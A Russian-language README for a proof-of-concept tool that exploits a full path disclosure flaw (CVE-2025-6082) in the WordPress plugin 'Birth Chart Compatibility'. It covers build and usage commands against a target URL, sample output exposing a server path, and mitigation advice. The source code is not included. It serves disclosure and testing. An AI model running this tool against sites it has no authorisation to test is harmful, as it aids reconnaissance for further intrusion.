
Proof‑of‑Concept эксплойт, эксплуатирующий уязвимость раскрытия полного пути в плагине “Birth Chart Compatibility” WordPress (<=v2.0)
Автор: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
Уязвимость: Раскрытие полного пути (CWE-200)
Данный Proof‑of‑Concept эксплуатирует ошибку раскрытия полного пути в плагине Birth Chart Compatibility для WordPress (версии ≤ 2.0). POC отправляет HTTP GET‑запрос к конечной точке index.php плагина, перехватывает любые PHP‑предупреждения или фатальные ошибки и извлекает путь в файловой системе сервера (например, /var/www/html/wp-content/plugins/... или C:\xampp\htdocs\...).
Раскрытие полного пути помогает злоумышленнику в проведении дальнейших атак, таких как локальное включение файлов (LFI), удалённое выполнение кода (RCE) или других разведывательных действий.
gcc или совместимый компилятор Clibcurlargparse.c / argparse.hgcc -o fpd-poc exploit.c argparse.c -lcurl
./fpd-poc -u https://target.com [опции]
Опции:
-u, --url (Обязательно) Базовый URL целевого сайта WordPress
-c, --cookies Использовать cookies из файла (опционально)
-v, --verbose Включить подробный вывод curl
-f, --loop Повторить запрос N раз (например, -f 10)
-h, --help Показать это справочное сообщение
Пример:
./fpd-poc -u https://victim.com
./fpd-poc -u https://victim.com -v -f 5 Пример вывода:
[+] Request sent successfully
[+] Input Url : https://victim.com
[+] Full Format Url: https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php
[+] Http Code : 200
====================================[Response]====================================
Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...
[+] Response Len : 256
[+] Keyword found: Warning:
[+] Context: Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php
Обновите плагин «Birth Chart Compatibility» до исправленной версии (> 2.0) сразу после её выхода.
Отключите или удалите плагин, если вы его не используете.
Запретите прямой доступ к файлам PHP плагина (index.php) через настройки вашего веб‑сервера (например, с помощью правил .htaccess или Nginx).
Отказ от ответственности Данный код предоставляется только для образовательных целей и тестирования. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, может быть незаконным.